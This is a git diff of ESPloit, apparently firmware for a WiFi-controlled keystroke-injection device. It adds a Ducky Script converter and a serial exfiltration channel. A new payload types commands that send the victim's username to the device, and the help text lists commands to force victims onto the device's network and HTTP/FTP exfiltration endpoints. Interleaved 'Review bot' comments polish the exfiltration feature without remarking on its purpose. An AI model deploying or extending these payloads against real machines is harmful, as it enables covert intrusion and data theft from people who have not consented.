diff --git a/README.md b/README.md index 2c789a1..610db12 100644 --- a/README.md +++ b/README.md @@ -70,7 +70,9 @@ You are now greeted with the main menu of ESPloit. From here there are several o Upload Payload: Upload a payload.txt file Choose Payload: Choose a payload to run Live Payload Mode: Type out or copy/paste a payload to run without uploading +Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script Input Mode: Use the device as a keyboard/mouse substitute +List Exfiltrated Data: Lists any exfiltrated data Configure ESPloit: Configure WiFi and basic settings Format File System: Format the file system Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser @@ -236,16 +238,24 @@ Live Payload Mode Here you may type out or copy/paste a payload to run without uploading. ----- -List Exfiltrated Data +Input Mode ----- -Displays any data that has been collected from the victim using ESPloit's exfiltration methods. +Use the device as a keyboard/mouse substitute. + +----- +Duckuino Mode +----- + +Convert Ducky Script to ESPloit Script and then optionally run the script. +Paste Ducky Script on the text area to the left. +Click convert and the ESPloit compatible script appears on the right. ----- -Input Mode +List Exfiltrated Data ----- -Use the device as a keyboard/mouse substitute. +Displays any data that has been collected from the victim using ESPloit's exfiltration methods. ----- Format File System 
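Review bot: the two new menu entries in the `@@ -70,7 +70,9 @@` hunk are inserted in a different order than in the HelpText.h hunk for the same list: here `Duckuino Mode:` goes before `Input Mode:` and `List Exfiltrated Data:` before `Configure ESPloit:`, while HelpText.h adds `Duckuino Mode:` after `Input Mode:` and `List Exfiltrated Data:` after `Configure ESPloit:`. Pick the order that matches the actual main menu and use it in both files, since users compare the on-device help against the README.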
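Review bot: the new Duckuino Mode section in the `@@ -236,16 +238,24 @@` hunk says the converted script can be "optionally run" but the steps stop at "Click convert"; add the step that triggers the run (the Duckuino.h hunk adds a `Run Payload` control next to `Convert`) and say whether the converted script is saved to the file system or only held in the text area, so the reader knows what is left on the device afterwards. A sentence asking the user to read the converter output before running it would fit here, as the Live Payload Mode section effectively assumes the same thing.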
@@ -275,7 +285,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and Exfiltrating Data ----- -To exfiltrate data be sure ESPloit and Target machine are on the same network. +Serial Exfiltration Method: +Find the victims com port +Set the baud rate to 38400 +Send the text "SerialEXFIL:" followed by the data to exfiltrate +Exfiltrated data will be saved to the file SerialEXFIL.txt +See the example payloads for more info + +WiFi Exfiltration Methods: +To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network. Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP. Example commands to force victim to connect to ESPloit's network(when set as AP): diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt new file mode 100644 index 0000000..963d39d --- /dev/null +++ b/payloads/LinSerialEXFIL.txt @@ -0,0 +1,5 @@ +Rem: Exfiltrate UserName from Linux Box using a Serial Link +Press:134+195 +PrintLine:gnome-terminal +CustomDelay:1000 +PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0 \ No newline at end of file diff --git a/source/ESP_Code/Duckuino.h b/source/ESP_Code/Duckuino.h index 69133f5..07a9d6e 100644 --- a/source/ESP_Code/Duckuino.h +++ b/source/ESP_Code/Duckuino.h @@ -102,6 +102,9 @@ menu a.hoverable:hover {
+ +<- BACK + Convert @@ -112,7 +115,7 @@ Run Payload
- +
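Review bot: the README `@@ -275,7 +285,15 @@` hunk says serial data "will be saved to the file SerialEXFIL.txt" but not that the firmware appends to it (the loop() hunk opens it with mode "a"), so the file accumulates across runs and only shrinks when deleted; document that the Delete File action on the List Exfiltrated Data page is how to clear it. "Find the victims com port" should read "victim's com port".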
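Review bot: payloads/LinSerialEXFIL.txt is added without a trailing newline ("\ No newline at end of file"); add one so the last `PrintLine:` entry is handled like the others and later diffs stay clean. The `Rem:` line should also state that the script assumes the device enumerates as /dev/ttyACM0, because the README step right above it says the port has to be found first, and an example that does not name its assumption will be read as if the path were fixed.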
diff --git a/source/ESP_Code/ESP_Code.ino b/source/ESP_Code/ESP_Code.ino index 20b5110..aa43f63 100644 --- a/source/ESP_Code/ESP_Code.ino +++ b/source/ESP_Code/ESP_Code.ino @@ -604,7 +604,7 @@ void ListPayloads(){ String FileList = "<- BACK TO INDEX

"; Dir dir = SPIFFS.openDir(directory); if(server.uri() == "/listpayloads") FileList += "File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Upload Payload

Live Payload Mode

"; - if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.
Current Network Configuration: ESPloit's IP= ")+local_IPstr+" SSID = "+ssid+" PASSWORD = "+password+"
Windows: netsh wlan set hostednetwork mode=allow ssid=\""+ssid+"\" key=\""+password+"\"
Linux: nmcli dev wifi connect "+ssid+" password "+password+"

For HTTP exfiltration method point the target machine to the url listed below:
http://"+local_IPstr+"/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE
For FTP exfiltration method use the credentials listed below:
Server: "+local_IPstr+" Username: "+ftp_username+" Password: "+ftp_password+"
See the example payloads for more in depth examples.

File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Display Payload ContentsSize in BytesRun PayloadDownload FileDelete Payload
"; + if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data using the serial method find the com port device is connected to
then be sure to set the baud rate to 38400 on the victim machine
and send the text \"SerialEXFIL:\" followed by the data to exfiltrate.
To exfiltrate data using the WiFi methods be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.
Current Network Configuration: ESPloit's IP= ")+local_IPstr+" SSID = "+ssid+" PASSWORD = "+password+"
Windows: netsh wlan set hostednetwork mode=allow ssid=\""+ssid+"\" key=\""+password+"\"
Linux: nmcli dev wifi connect "+ssid+" password "+password+"

For HTTP exfiltration method point the target machine to the url listed below:
http://"+local_IPstr+"/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE
For FTP exfiltration method use the credentials listed below:
Server: "+local_IPstr+" Username: "+ftp_username+" Password: "+ftp_password+"
See the example payloads for more in depth examples.

File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Display File ContentsSize in BytesDownload FileDelete File
"; while (dir.next()) { String FileName = dir.fileName(); File f = dir.openFile("r"); @@ -1162,7 +1162,14 @@ void loop() { if(cmd == "Version"){ ardversion = Serial.readStringUntil('\n'); } + if(cmd == "SerialEXFIL"){ + String SerialEXFIL = Serial.readStringUntil('\n'); + File f = SPIFFS.open("/SerialEXFIL.txt", "a"); + f.println(SerialEXFIL); + f.close(); + } } + //Serial.print("Free heap-"); //Serial.println(ESP.getFreeHeap(),DEC); } diff --git a/source/ESP_Code/ESP_Code.ino.generic.bin b/source/ESP_Code/ESP_Code.ino.generic.bin index b13d803..033b80a 100644 Binary files a/source/ESP_Code/ESP_Code.ino.generic.bin and b/source/ESP_Code/ESP_Code.ino.generic.bin differ diff --git a/source/ESP_Code/HelpText.h b/source/ESP_Code/HelpText.h index 75505f2..64027a3 100644 --- a/source/ESP_Code/HelpText.h +++ b/source/ESP_Code/HelpText.h @@ -74,7 +74,9 @@ Upload Payload: Upload a payload.txt file
Choose Payload: Choose a payload to run
Live Payload Mode: Type out or copy/paste a payload to run without uploading
Input Mode: Use the device as a keyboard/mouse substitute
+Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script
Configure ESPloit: Configure WiFi and basic settings
+List Exfiltrated Data: Lists any exfiltrated data
Format File System: Format the file system
Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser
Help: Brings up this help file
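Review bot: in the rewritten F() string for `/exfiltrate/list` in the `@@ -604,7 +604,7 @@` hunk, "find the com port device is connected to" is missing "the" before "device", and the baud rate 38400 is now hard-coded as prose here, in README.md and in HelpText.h with no constant tying the three to the rate the firmware actually uses, so a future change to the serial speed leaves three strings stale; keep the rate in one `#define` and build the help text from it. Separately, the response body still embeds the AP password and the FTP password in plain text; that predates this change, but since the string is being rewritten anyway this is the moment to decide whether the passwords need to be echoed back to the browser at all.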
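Review bot: the new `SerialEXFIL` branch in the loop() hunk (`@@ -1162,7 +1162,14 @@`) never checks that `SPIFFS.open("/SerialEXFIL.txt", "a")` succeeded before calling `f.println(SerialEXFIL)`; on a full or unformatted file system `open` returns an invalid File and the write is silently lost, so add `if (!f) { return; }` (or a Serial error print) after the open. Also, `Serial.readStringUntil('\n')` has no length bound, so a long or never-terminated line grows a heap String until the read timeout, and nothing limits how large SerialEXFIL.txt may become; cap the accepted line length and skip the write when `SPIFFS.info()` reports little free space, otherwise anything talking on the serial port can fill SPIFFS and break payload uploads and the firmware's own files. The stray blank `+` line before the commented-out free-heap prints is noise and can be dropped.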
@@ -144,7 +146,7 @@ Scripting a Payload
-----

ESPloit uses its own scripting language and not Ducky Script,
-although a Ducky Script to ESPloit converter is available at: https://exploitagency.github.io/Duckuino/index.html
+although a Ducky Script to ESPloit converter is available in the Duckuino Mode page

Examples of ESPloit's scripting language can be seen below.

@@ -239,16 +241,24 @@ Live Payload Mode
Here you may type out or copy/paste a payload to run without uploading.

-----
-List Exfiltrated Data
+Input Mode
-----

-Displays any data that has been collected from the victim using ESPloit's exfiltration methods.
+Use the device as a keyboard/mouse substitute.

-----
-Input Mode
+Duckuino Mode
-----

-Use the device as a keyboard/mouse substitute.
+Convert Ducky Script to ESPloit Script and then optionally run the script.
+Paste Ducky Script on the text area to the left.
+Click convert and the ESPloit compatible script appears on the right.
+
+-----
+List Exfiltrated Data
+-----
+
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.

-----
Format File System
@@ -278,7 +288,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and Exfiltrating Data
-----

-To exfiltrate data be sure ESPloit and Target machine are on the same network.
+Serial Exfiltration Method:
+Find the victims com port
+Set the baud rate to 38400 on victim machine
+Send the text "SerialEXFIL:" followed by the data to exfiltrate
+Exfiltrated data will be saved to the file SerialEXFIL.txt
+See the example payloads for more info
+
+WiFi Exfiltration Methods:
+To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.

Example commands to force victim to connect to ESPloit's network(when set as AP):
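Review bot: the serial steps in the `@@ -278,7 +288,15 @@` hunk already differ from the README copy added in the same commit ("Set the baud rate to 38400 on victim machine" here versus "Set the baud rate to 38400" there) and both copies write "victims" for "victim's"; either generate the README section from HelpText.h or keep the two texts literally identical, because divergence between the on-device help and the README is how these instructions rot. With the new "WiFi Exfiltration Methods:" subheading, the unchanged "Example commands to force victim to connect to ESPloit's network" block below now belongs only to the WiFi methods and should sit under that subheading rather than read as applying to the serial method too.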
diff --git a/source/ESP_Code/version.h b/source/ESP_Code/version.h index 12e8447..7f392a9 100644 --- a/source/ESP_Code/version.h +++ b/source/ESP_Code/version.h @@ -1,2 +1,2 @@ -String version = "2.6.1337"; +String version = "2.7.331"; String latestardversion = "2.2";